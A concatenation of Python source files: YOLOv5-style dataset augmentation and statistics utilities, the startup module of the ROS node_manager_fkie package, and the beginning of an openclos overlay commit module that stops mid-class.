            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        # pad offsets translate label coordinates from image to canvas space
        padw = x1a - x1b
        padh = y1a - y1b

        # Labels
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
        labels4.append(labels)
        segments4.extend(segments)

    # Concat/clip labels to the 2s x 2s canvas
    labels4 = np.concatenate(labels4, 0)
    for x in (labels4[:, 1:], *segments4):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img4, labels4 = replicate(img4, labels4)  # replicate

    # Augment
    img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
    img4, labels4 = random_perspective(img4, labels4, segments4,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove
    return img4, labels4
def load_mosaic9(self, index):
    """Build a 9-image mosaic for dataset item `index`.

    The requested image plus 8 random ones are placed spiral-wise on a
    3s x 3s canvas, which is then cropped to 2s x 2s around a random offset
    and augmented with random_perspective. Returns (img9, labels9).
    """
    # loads images in a 9-mosaic
    labels9, segments9 = [], []
    s = self.img_size
    indices = [index] + random.choices(self.indices, k=8)  # 8 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img9; `c` is the (xmin, ymin, xmax, ymax) slot on the
        # 3s x 3s canvas. hp/wp are the previous tile's size, set at the end
        # of the loop, and are used by the slots that abut the previous tile.
        if i == 0:  # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            h0, w0 = h, w  # size of the center tile, reused by later slots
            c = s, s, s + w, s + h  # xmin, ymin, xmax, ymax (base) coordinates
        elif i == 1:  # top
            c = s, s - h, s + w, s
        elif i == 2:  # top right
            c = s + wp, s - h, s + wp + w, s
        elif i == 3:  # right
            c = s + w0, s, s + w0 + w, s + h
        elif i == 4:  # bottom right
            c = s + w0, s + hp, s + w0 + w, s + hp + h
        elif i == 5:  # bottom
            c = s + w0 - w, s + h0, s + w0, s + h0 + h
        elif i == 6:  # bottom left
            c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
        elif i == 7:  # left
            c = s - w, s + h0 - h, s, s + h0
        elif i == 8:  # top left
            c = s - w, s + h0 - hp - h, s, s + h0 - hp

        padx, pady = c[:2]
        x1, y1, x2, y2 = [max(x, 0) for x in c]  # allocate coords

        # Labels (shifted from image space into canvas space)
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
        labels9.append(labels)
        segments9.extend(segments)

        # Image
        img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:]  # img9[ymin:ymax, xmin:xmax]
        hp, wp = h, w  # height, width previous

    # Offset: crop a random 2s x 2s window out of the 3s x 3s canvas
    yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border]  # mosaic center x, y
    img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]

    # Concat/clip labels, translating into the cropped window's coordinates
    labels9 = np.concatenate(labels9, 0)
    labels9[:, [1, 3]] -= xc
    labels9[:, [2, 4]] -= yc
    c = np.array([xc, yc])  # centers
    segments9 = [x - c for x in segments9]

    for x in (labels9[:, 1:], *segments9):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img9, labels9 = replicate(img9, labels9)  # replicate

    # Augment
    img9, labels9 = random_perspective(img9, labels9, segments9,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove
    return img9, labels9
def create_folder(path='./new'):
    """Create an empty directory at `path`, removing any existing one first."""
    if os.path.exists(path):
        # wipe previous contents so the caller always starts from empty
        shutil.rmtree(path)
    os.makedirs(path)
def flatten_recursive(path='../datasets/coco128'):
    """Copy every file found under `path` (recursively) into a freshly
    created flat sibling directory named '<path>_flat'."""
    flat_dir = Path(path + '_flat')
    create_folder(flat_dir)  # start from an empty output directory
    pattern = str(Path(path)) + '/**/*.*'
    for file in tqdm(glob.glob(pattern, recursive=True)):
        # copy by basename only; files with duplicate names overwrite
        shutil.copyfile(file, flat_dir / Path(file).name)
def extract_boxes(path='../datasets/coco128'):  # from utils.datasets import *; extract_boxes()
    """Convert a detection dataset into a classification dataset: crop every
    labelled box (padded by 20% + 3px) into <path>/classifier/<class>/ as its
    own image file. Removes any existing 'classifier' directory first."""
    path = Path(path)  # images dir
    shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None  # remove existing
    files = list(path.rglob('*.*'))
    n = len(files)  # number of files
    for im_file in tqdm(files, total=n):
        if im_file.suffix[1:] in IMG_FORMATS:
            # image
            im = cv2.imread(str(im_file))[..., ::-1]  # BGR to RGB
            h, w = im.shape[:2]

            # labels
            lb_file = Path(img2label_paths([str(im_file)])[0])
            if Path(lb_file).exists():
                with open(lb_file, 'r') as f:
                    lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32)  # labels

                for j, x in enumerate(lb):
                    c = int(x[0])  # class
                    # BUGFIX: use a distinct name for the crop path; the
                    # original reused `f`, shadowing the file-handle variable.
                    crop_file = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg'  # new filename
                    if not crop_file.parent.is_dir():
                        crop_file.parent.mkdir(parents=True)

                    b = x[1:] * [w, h, w, h]  # box
                    # b[2:] = b[2:].max()  # rectangle to square
                    b[2:] = b[2:] * 1.2 + 3  # pad
                    # BUGFIX: np.int was deprecated in NumPy 1.20 and removed
                    # in 1.24; the builtin int is the documented replacement.
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)

                    b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                    b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                    assert cv2.imwrite(str(crop_file), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {crop_file}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
    """ Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
    Usage: from utils.datasets import *; autosplit()
    Arguments
        path:            Path to images directory
        weights:         Train, val, test weights (list, tuple)
        annotated_only:  Only use images with an annotated txt file
    """
    path = Path(path)  # images dir
    image_files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], [])  # image files only
    total = len(image_files)
    random.seed(0)  # fixed seed -> reproducible split assignment
    split_ids = random.choices([0, 1, 2], weights=weights, k=total)  # one split index per image

    txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt']  # 3 txt files
    for name in txt:
        (path.parent / name).unlink(missing_ok=True)  # remove any previous split files

    print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
    for split_id, img in tqdm(zip(split_ids, image_files), total=total):
        if not annotated_only or Path(img2label_paths([str(img)])[0]).exists():  # check label
            with open(path.parent / txt[split_id], 'a') as f:
                f.write('./' + img.relative_to(path.parent).as_posix() + '\n')  # add image to txt file
def verify_image_label(args):
    """Verify one image-label pair.

    args is (im_file, lb_file, prefix). Returns
    (im_file, labels, shape, segments, nm, nf, ne, nc, msg) where nm/nf/ne/nc
    are 0/1 flags for label missing/found/empty/corrupt; on any exception the
    first four entries are None and nc is 1, with the error text in msg.
    """
    im_file, lb_file, prefix = args
    nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', []  # number (missing, found, empty, corrupt), message, segments
    try:
        # verify images
        im = Image.open(im_file)
        im.verify()  # PIL verify (does not decode the full image)
        shape = exif_size(im)  # image size
        assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
        assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
        if im.format.lower() in ('jpg', 'jpeg'):
            with open(im_file, 'rb') as f:
                f.seek(-2, 2)
                # a valid JPEG must end with the EOI marker 0xFFD9
                if f.read() != b'\xff\xd9':  # corrupt JPEG
                    Image.open(im_file).save(im_file, format='JPEG', subsampling=0, quality=100)  # re-save image
                    msg = f'{prefix}WARNING: corrupt JPEG restored and saved {im_file}'

        # verify labels
        if os.path.isfile(lb_file):
            nf = 1  # label found
            with open(lb_file, 'r') as f:
                l = [x.split() for x in f.read().strip().splitlines() if len(x)]
                # rows longer than 8 values are polygon segments, not boxes
                if any([len(x) > 8 for x in l]):  # is segment
                    classes = np.array([x[0] for x in l], dtype=np.float32)
                    segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l]  # (cls, xy1...)
                    l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1)  # (cls, xywh)
                l = np.array(l, dtype=np.float32)
            if len(l):
                assert l.shape[1] == 5, 'labels require 5 columns each'
                assert (l >= 0).all(), 'negative labels'
                assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
                assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
            else:
                ne = 1  # label empty
                l = np.zeros((0, 5), dtype=np.float32)
        else:
            nm = 1  # label missing
            l = np.zeros((0, 5), dtype=np.float32)
        return im_file, l, shape, segments, nm, nf, ne, nc, msg
    except Exception as e:
        # any validation failure marks the pair as corrupt; callers inspect msg
        nc = 1
        msg = f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}'
        return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
    """ Return dataset statistics dictionary with images and instances counts per split per class
    To run in parent directory: export PYTHONPATH="$PWD/yolov5"
    Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
    Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
    Arguments
        path:           Path to data.yaml or data.zip (with data.yaml inside data.zip)
        autodownload:   Attempt to download dataset if not found locally
        verbose:        Print stats dictionary
        profile:        Benchmark saving/loading the stats as .npy and .json
        hub:            Also export resized images and stats.json for HUB upload
    """

    def round_labels(labels):
        # Update labels to integer class and 6 decimal place floats
        return [[int(c), *[round(x, 4) for x in points]] for c, *points in labels]

    def unzip(path):
        # Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
        if str(path).endswith('.zip'):  # path is data.zip
            assert Path(path).is_file(), f'Error unzipping {path}, file not found'
            assert os.system(f'unzip -q {path} -d {path.parent}') == 0, f'Error unzipping {path}'
            dir = path.with_suffix('')  # dataset directory
            return True, str(dir), next(dir.rglob('*.yaml'))  # zipped, data_dir, yaml_path
        else:  # path is data.yaml
            return False, None, path

    def hub_ops(f, max_dim=1920):
        # HUB ops for 1 image 'f': downscale so the longest side is <= max_dim
        im = Image.open(f)
        r = max_dim / max(im.height, im.width)  # ratio
        if r < 1.0:  # image too large
            im = im.resize((int(im.width * r), int(im.height * r)))
        im.save(im_dir / Path(f).name, quality=75)  # save

    zipped, data_dir, yaml_path = unzip(Path(path))
    with open(check_yaml(yaml_path), errors='ignore') as f:
        data = yaml.safe_load(f)  # data dict
        if zipped:
            data['path'] = data_dir  # TODO: should this be dir.resolve()?
    check_dataset(data, autodownload)  # download dataset if missing
    hub_dir = Path(data['path'] + ('-hub' if hub else ''))
    stats = {'nc': data['nc'], 'names': data['names']}  # statistics dictionary
    for split in 'train', 'val', 'test':
        if data.get(split) is None:
            stats[split] = None  # i.e. no test set
            continue
        x = []
        dataset = LoadImagesAndLabels(data[split])  # load dataset
        # per-image class histogram: one row of length nc per image
        for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
            x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
        x = np.array(x)  # shape(128x80)
        stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
                        'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
                                        'per_class': (x > 0).sum(0).tolist()},
                        'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
                                   zip(dataset.img_files, dataset.labels)]}

        if hub:
            im_dir = hub_dir / 'images'
            im_dir.mkdir(parents=True, exist_ok=True)
            # resize images in parallel; hub_ops writes into im_dir as a side effect
            for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
                pass

    # Profile
    stats_path = hub_dir / 'stats.json'
    if profile:
        for _ in range(1):
            file = stats_path.with_suffix('.npy')
            t1 = time.time()
            np.save(file, stats)
            t2 = time.time()
            x = np.load(file, allow_pickle=True)
            print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')

            file = stats_path.with_suffix('.json')
            t1 = time.time()
            with open(file, 'w') as f:
                json.dump(stats, f)  # save stats *.json
            t2 = time.time()
            with open(file, 'r') as f:
                x = json.load(f)  # load hyps dict
            print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')

    # Save, print and return
    if hub:
        print(f'Saving {stats_path.resolve()}...')
        with open(stats_path, 'w') as f:
            json.dump(stats, f)  # save stats.json
    if verbose:
        print(json.dumps(stats, indent=2, sort_keys=False))
    return stats
|
__init__.py | #!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import argparse
import os
import roslib.network
import rospy
import socket
import sys
import threading
from master_discovery_fkie.common import get_hostname
from node_manager_fkie.common import get_ros_home, masteruri_from_ros
from node_manager_fkie.file_watcher import FileWatcher
from node_manager_fkie.history import History
from node_manager_fkie.master_view_proxy import LaunchArgsSelectionRequest
from node_manager_fkie.name_resolution import NameResolution
from node_manager_fkie.progress_queue import InteractionNeededError
from node_manager_fkie.screen_handler import ScreenHandler, ScreenSelectionRequest, NoScreenOpenLogRequest
from node_manager_fkie.settings import Settings
from node_manager_fkie.ssh_handler import SSHhandler, AuthenticationRequest
from node_manager_fkie.start_handler import StartException, AdvRunCfg
from node_manager_fkie.start_handler import StartHandler, BinarySelectionRequest
PKG_NAME = 'node_manager_fkie'
__author__ = "Alexander Tiderko (Alexander.Tiderko@fkie.fraunhofer.de)"
__copyright__ = "Copyright (c) 2012 Alexander Tiderko, Fraunhofer FKIE/US"
__license__ = "BSD"
__version__ = "0.8.2" # git describe --tags --dirty --always
__date__ = "2018-08-10" # git log -1 --date=iso
# PYTHONVER = (2, 7, 1)
# if sys.version_info < PYTHONVER:
# print 'For full scope of operation this application requires python version > %s, current: %s' % (str(PYTHONVER), sys.version_info)
HOSTS_CACHE = dict()
'''
the cache directory to store the results of tests for local hosts.
@see: L{is_local()}
'''
_LOCK = threading.RLock()
_MAIN_FORM = None
_SETTINGS = None
_SSH_HANDLER = None
_SCREEN_HANDLER = None
_START_HANDLER = None
_NAME_RESOLUTION = None
_HISTORY = None
_FILE_WATCHER = None
_FILE_WATCHER_PARAM = None
_QAPP = None
def settings():
    '''
    @return: The global settings (C{None} until L{init_settings()} was called)
    @rtype: L{Settings}
    '''
    return _SETTINGS
def ssh():
    '''
    @return: The SSH handler to handle the SSH connections
             (C{None} until L{init_globals()} was called)
    @rtype: L{SSHhandler}
    '''
    return _SSH_HANDLER
def screen():
    '''
    @return: The screen handler to the screens
             (C{None} until L{init_globals()} was called)
    @rtype: L{ScreenHandler}
    @see: U{http://linuxwiki.de/screen}
    '''
    return _SCREEN_HANDLER
def starter():
    '''
    @return: The start handler to handle the start of new ROS nodes on local or
             remote machines (C{None} until L{init_globals()} was called)
    @rtype: L{StartHandler}
    '''
    return _START_HANDLER
def nameres():
    '''
    @return: The name resolution object which translates the name to the host
             or ROS master URI (C{None} until L{init_globals()} was called)
    @rtype: L{NameResolution}
    '''
    return _NAME_RESOLUTION
def history():
    '''
    @return: The history of entered parameters
             (C{None} until L{init_globals()} was called)
    @rtype: L{History}
    '''
    return _HISTORY
def filewatcher():
    '''
    @return: The file watcher object with all loaded configuration files
             (C{None} until L{init_globals()} was called)
    @rtype: L{FileWatcher}
    '''
    return _FILE_WATCHER
def file_watcher_param():
    '''
    @return: The file watcher object with all configuration files referenced by
             parameter value (C{None} until L{init_globals()} was called)
    @rtype: L{FileWatcher}
    '''
    return _FILE_WATCHER_PARAM
def get_ros_hostname(url):
    '''
    Returns the host name used in a url, if it is a name. If it is an IP an
    empty string will be returned. Delegates to
    L{NameResolution.get_ros_hostname}.
    @param url: the URL to inspect
    @type url: C{str}
    @return: host or '' if url is an IP or invalid
    @rtype: C{str}
    '''
    return NameResolution.get_ros_hostname(url)
def is_local(hostname, wait=False):
    '''
    Test whether the given host name is the name of the local host or not.
    Results are cached in HOSTS_CACHE; while an asynchronous resolution is
    running, the cache holds the resolver Thread instead of a boolean.
    @param hostname: the name or IP of the host
    @type hostname: C{str}
    @param wait: if C{True} resolve the name synchronously instead of
                 spawning a background thread
    @type wait: C{bool}
    @return: C{True} if the hostname is local or None
    @rtype: C{bool}
    @raise Exception: on errors while resolving host
    '''
    if hostname is None:
        # no host given: treat as the local host
        return True
    with _LOCK:
        if hostname in HOSTS_CACHE:
            if isinstance(HOSTS_CACHE[hostname], threading.Thread):
                # resolution still running in the background; report
                # "not local" until the thread stores the real result
                return False
            return HOSTS_CACHE[hostname]
    try:
        # inet_aton succeeds only for a dotted IPv4 address -> no DNS needed
        socket.inet_aton(hostname)
        local_addresses = ['localhost'] + roslib.network.get_local_addresses()
        # check 127/8 and local addresses
        result = hostname.startswith('127.') or hostname in local_addresses
        with _LOCK:
            HOSTS_CACHE[hostname] = result
        return result
    except socket.error:
        # the hostname must be resolved => do it in a thread
        if wait:
            result = __is_local(hostname)
            return result
        else:
            thread = threading.Thread(target=__is_local, args=((hostname,)))
            thread.daemon = True
            with _LOCK:
                # mark resolution as "in progress" by caching the thread itself
                HOSTS_CACHE[hostname] = thread
            thread.start()
            return False
def __is_local(hostname):
    '''
    Resolve `hostname` via socket.gethostbyname() and decide whether it maps
    to this machine; the boolean result is stored in HOSTS_CACHE.
    '''
    try:
        machine_addr = socket.gethostbyname(hostname)
    except socket.gaierror:
        # unresolvable names are treated (and cached) as remote
        with _LOCK:
            HOSTS_CACHE[hostname] = False
        return False
    # check 127/8 and local addresses
    known_local = ['localhost'] + roslib.network.get_local_addresses()
    is_local_addr = machine_addr.startswith('127.') or machine_addr in known_local
    with _LOCK:
        HOSTS_CACHE[hostname] = is_local_addr
    return is_local_addr
def finish(*arg):
    '''
    Callback called on exit of the ros node. Closes SSH sessions, persists the
    launch history, stops the main window's threads and exits the Qt app.
    '''
    # close all ssh sessions
    if _SSH_HANDLER is not None:
        _SSH_HANDLER.close()
    # save the launch history
    if _HISTORY is not None:
        try:
            _HISTORY.storeAll()
        except Exception as err:
            # best effort: a failed history write must not block shutdown
            print >> sys.stderr, "Error while store history: %s" % err
    # import here to avoid a Qt dependency at module import time
    from node_manager_fkie.main_window import MainWindow
    # stop all threads in the main window
    if isinstance(_MAIN_FORM, MainWindow):
        _MAIN_FORM.finish()
    if _QAPP is not None:
        _QAPP.exit()
def set_terminal_name(name):
    '''
    Change the terminal name.
    @param name: New name of the terminal
    @type name: C{str}
    '''
    # OSC 2 escape sequence: sets the window title in xterm-like terminals
    title_sequence = "\x1b]2;%s\x07" % name
    sys.stdout.write(title_sequence)
def set_process_name(name):
    '''
    Change the process name shown by tools like ps/top. Works on Linux via
    libc prctl(); silently does nothing on other platforms.
    @param name: New process name
    @type name: C{str}
    '''
    try:
        from ctypes import cdll, byref, create_string_buffer
        libc = cdll.LoadLibrary('libc.so.6')
        buff = create_string_buffer(len(name) + 1)
        buff.value = name
        # PR_SET_NAME = 15, see prctl(2); best effort only
        libc.prctl(15, byref(buff), 0, 0, 0)
    except Exception:
        # BUGFIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; keep the best-effort behaviour for real errors.
        pass
def init_settings():
    '''
    Create the global L{Settings} instance that is returned by L{settings()}.
    '''
    global _SETTINGS
    _SETTINGS = Settings()
def init_globals(masteruri):
    '''
    Create all global handler objects (SSH, screen, start handler, name
    resolution, history and file watchers) and pre-fill the local-host cache.
    :param masteruri: the URI of the ROS master to test for locality
    :return: True if the masteruri referred to localhost
    :rtype: bool
    '''
    # initialize the global handler
    global _SSH_HANDLER
    global _SCREEN_HANDLER
    global _START_HANDLER
    global _NAME_RESOLUTION
    global _HISTORY
    global _FILE_WATCHER
    global _FILE_WATCHER_PARAM
    _SSH_HANDLER = SSHhandler()
    _SCREEN_HANDLER = ScreenHandler()
    _START_HANDLER = StartHandler()
    _NAME_RESOLUTION = NameResolution()
    _HISTORY = History()
    _FILE_WATCHER = FileWatcher()
    _FILE_WATCHER_PARAM = FileWatcher()

    # test where the roscore is running (local or remote)
    __is_local('localhost')  # fill cache
    return __is_local(get_hostname(masteruri))  # fill cache
def init_arg_parser():
    '''
    Build the command line parser for the node manager.
    @return: the configured argument parser
    @rtype: C{argparse.ArgumentParser}
    '''
    parser = argparse.ArgumentParser()
    parser.add_argument("--version", action="version",
                        version="%s %s" % ("%(prog)s", __version__))
    parser.add_argument("-f", "--file", nargs=1,
                        help="loads the given file as default on start")
    parser.add_argument("-m", "--muri", nargs=1, default='',
                        help="starts ROS master with given URI, usefull on hosts "
                             "with multiple interfaces. ROS_HOSTNAME will be set "
                             "to the host of this URI, but only if it is not an IP.")
    # options used only by the echo dialog mode
    echo_group = parser.add_argument_group('echo')
    echo_group.add_argument("--echo", nargs=2, metavar=('name', 'type'),
                            help="starts an echo dialog instead of node manager")
    echo_group.add_argument("--hz", action="store_true",
                            help="shows only the Hz value instead of topic content in echo dialog")
    echo_group.add_argument("--ssh", action="store_true", help="connects via SSH")
    return parser
def init_echo_dialog(prog_name, masteruri, topic_name, topic_type, hz=False, use_ssh=False):
    '''
    Initialize the environment to start an echo window: registers the rospy
    node, renames terminal/process and creates the dialog.
    @return: the created echo dialog
    @rtype: L{EchoDialog}
    '''
    # start ROS-Master, if not currently running
    # StartHandler._prepareROSMaster(masteruri)
    name = '%s_echo' % prog_name
    rospy.init_node(name, anonymous=True, log_level=rospy.INFO)
    set_terminal_name(name)
    set_process_name(name)
    # import here to avoid a Qt dependency at module import time
    from node_manager_fkie.echo_dialog import EchoDialog
    global _SSH_HANDLER
    _SSH_HANDLER = SSHhandler()
    return EchoDialog(topic_name, topic_type, hz, masteruri, use_ssh=use_ssh)
def init_main_window(prog_name, masteruri, launch_files=[]):
    '''
    Initialize the environment to start Node Manager: starts the ROS master if
    needed, registers the rospy node and creates the main window.
    @param launch_files: launch files passed on the command line
    @return: the created main window
    @rtype: L{MainWindow}
    '''
    # NOTE: mutable default `launch_files=[]` is shared between calls; safe
    # here only as long as the list is never mutated.
    # start ROS-Master, if not currently running
    StartHandler._prepareROSMaster(masteruri)
    # setup the loglevel
    try:
        log_level = getattr(rospy, rospy.get_param('/%s/log_level' % prog_name, "INFO"))
    except Exception as err:
        print("Error while set the log level: %s\n->INFO level will be used!" % err)
        log_level = rospy.INFO
    rospy.init_node(prog_name, anonymous=False, log_level=log_level)
    set_terminal_name(prog_name)
    set_process_name(prog_name)
    # import here to avoid a Qt dependency at module import time
    from node_manager_fkie.main_window import MainWindow
    local_master = init_globals(masteruri)
    # NOTE(review): launch_files is passed as both the 1st and 3rd argument --
    # confirm against the MainWindow constructor signature.
    return MainWindow(launch_files, not local_master, launch_files)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%% MAIN %%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def main(name):
    '''
    Start the NodeManager or EchoDialog.
    :param name: the name propagated to the rospy.init_node()
    :type name: str
    :return: the Qt application exit code
    '''
    # Qt4 provides QApplication in QtGui, Qt5 in QtWidgets; try both.
    try:
        from python_qt_binding.QtGui import QApplication
    except:
        try:
            from python_qt_binding.QtWidgets import QApplication
        except:
            print >> sys.stderr, "please install 'python_qt_binding' package!!"
            sys.exit(-1)
    init_settings()
    parser = init_arg_parser()
    # rospy.myargv strips ROS remapping arguments before argparse sees them
    args = rospy.myargv(argv=sys.argv)
    parsed_args = parser.parse_args(args[1:])
    if parsed_args.muri:
        # export the requested master URI (and hostname, if it is a name)
        # to the environment before reading the settings
        masteruri = parsed_args.muri[0]
        hostname = NameResolution.get_ros_hostname(masteruri)
        os.environ['ROS_MASTER_URI'] = masteruri
        if hostname:
            os.environ['ROS_HOSTNAME'] = hostname
    masteruri = settings().masteruri()
    # Initialize Qt
    global _QAPP
    _QAPP = QApplication(sys.argv)
    # decide to show main or echo dialog
    global _MAIN_FORM
    try:
        if parsed_args.echo:
            _MAIN_FORM = init_echo_dialog(name, masteruri, parsed_args.echo[0],
                                          parsed_args.echo[1], parsed_args.hz,
                                          parsed_args.ssh)
        else:
            _MAIN_FORM = init_main_window(name, masteruri, parsed_args.file)
    except Exception as err:
        sys.exit("%s" % err)
    exit_code = 0
    # resize and show the qt window
    if not rospy.is_shutdown():
        # change path for access to the images of descriptions
        os.chdir(settings().PACKAGE_DIR)
        # _MAIN_FORM.resize(1024, 720)
        # maximize when the window would not fit on the available screen
        screen_size = QApplication.desktop().availableGeometry()
        if (_MAIN_FORM.size().width() >= screen_size.width() or
                _MAIN_FORM.size().height() >= screen_size.height() - 24):
            _MAIN_FORM.showMaximized()
        else:
            _MAIN_FORM.show()
        exit_code = -1
        rospy.on_shutdown(finish)
        exit_code = _QAPP.exec_()
    return exit_code
|
overlayCommit.py | '''
Created on Feb 15, 2016
@author: yunli
'''
import traceback
import logging
from threading import Thread, Event, RLock
import concurrent.futures
import Queue
from sqlalchemy.orm import exc
from jnpr.openclos.overlay.overlayModel import OverlayDeployStatus
from jnpr.openclos.dao import Dao
from jnpr.openclos.loader import OpenClosProperty, loadLoggingConfig
from jnpr.openclos.common import SingletonBase
from jnpr.openclos.exception import DeviceRpcFailed, DeviceConnectFailed
from jnpr.openclos.deviceConnector import CachedConnectionFactory, NetconfConnection
DEFAULT_MAX_THREADS = 10
DEFAULT_DISPATCH_INTERVAL = 10
DEFAULT_DAO_CLASS = Dao
moduleName = 'overlayCommit'
loadLoggingConfig(appName=moduleName)
logger = logging.getLogger(moduleName)
class OverlayCommitJob():
    """A single configlet commit against one overlay device.

    Holds a snapshot of one OverlayDeployStatus row (ids, credentials,
    configlet, operation) so the job stays valid after the DB session that
    produced the row has been closed.
    """

    def __init__(self, parent, deployStatusObject):
        # Note we only hold on to the data from the deployStatusObject (deviceId, configlet, etc.).
        # We are not holding reference to the deployStatusObject itself as it can become invalid when db session is out of scope
        self.parent = parent
        self.id = deployStatusObject.id
        self.deviceId = deployStatusObject.overlay_device.id
        self.deviceIp = deployStatusObject.overlay_device.address
